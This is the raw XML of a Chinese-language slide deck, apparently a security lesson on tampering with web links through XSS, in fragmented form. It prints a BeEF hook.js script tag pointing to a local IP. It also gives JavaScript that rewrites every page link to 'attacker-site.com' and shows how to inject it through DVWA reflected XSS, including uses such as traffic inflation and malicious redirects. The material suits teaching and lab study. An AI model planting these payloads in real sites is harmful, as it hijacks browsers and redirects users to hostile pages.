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篡改网页链接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Beef </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行恶意链接生成，以及利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hook.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行其他命令。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&lt;script src=”http://192.168.253.28:3000/hook.js”&gt;&lt;/script&gt;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335" y="1345565"/>
            <a:ext cx="8355965" cy="474281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5565"/>
            <a:ext cx="10058400" cy="5364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82912" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="2982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13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代码讲解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863465" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="486346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732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篡改链接指向不良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27926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篡改链接指向恶意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982912" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="29829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4130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代码讲解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863465" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="486346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1732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篡改链接指向不良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27926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篡改链接指向恶意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URL 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代码讲解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595" y="855980"/>
            <a:ext cx="10600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window.onload  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当窗口加载时，执行匿名函数。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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>循环遍历所有获得的链接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标签。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window.onload = function()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var link=document.getElementsByTagName("a");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for(j = 0; j &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.length; j++)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link[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].href="http://attacker-site.com/";}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12660000">
            <a:off x="3589655" y="4084320"/>
            <a:ext cx="2214880" cy="23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50205" y="48691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替换为其他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篡改链接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将篡改代码注入到对应的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位置。以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反射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为例。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125855"/>
            <a:ext cx="10478135" cy="5200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26155" y="3081655"/>
            <a:ext cx="51403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篡改链接指向流量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刷流量，某些站点的重定向。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https://weibo.com/2081681517/GEZpU841G?ref=feedsdk&amp;type=comment#_rnd1540197060886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679575"/>
            <a:ext cx="9399905" cy="4969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篡改链接指向恶意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 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JS代码讲解</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>XSS篡改链接</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>篡改链接指向流量URL</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>篡改链接指向恶意URL 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93</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T11:14:05Z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